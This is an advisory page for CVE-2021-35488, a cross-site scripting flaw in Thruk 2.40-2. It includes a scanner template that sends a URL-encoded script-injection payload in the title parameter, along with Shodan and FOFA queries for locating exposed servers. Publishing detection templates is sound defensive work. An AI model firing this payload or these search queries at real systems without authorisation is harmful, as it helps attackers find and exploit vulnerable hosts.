CVE-2021-35488: Thruk 2.40-2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Thruk | POC: 已公开

漏洞描述

Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.

PoC代码[已公开]

id: CVE-2021-35488

info:
  name: Thruk 2.40-2 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://www.gruppotim.it/redteam
    - https://www.thruk.org/changelog.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35488
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-35488
    cwe-id: CWE-79
    epss-score: 0.16437
    epss-percentile: 0.9465
    cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thruk
    product: thruk
    shodan-query:
      - http.html:"Thruk"
      - http.html:"thruk"
    fofa-query:
      - body="thruk"
      - title=="thruk monitoring webinterface"
  tags: cve2021,cve,thruk,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "'></script><script>alert(document.domain)</script>"
          - "Thruk Monitoring"
        condition: and

      - type: status
        status:
          - 401
# digest: 490a0046304402204c6845e92dc4bf6288cacb73390341114bc68efb53171725d3aeb709e3903fb30220485690f8d4513674ca09ab431016d1799901057853f08e22ce0c32ba6f1d7901:922c64590222798bb761d5b6d8e72950

相关漏洞推荐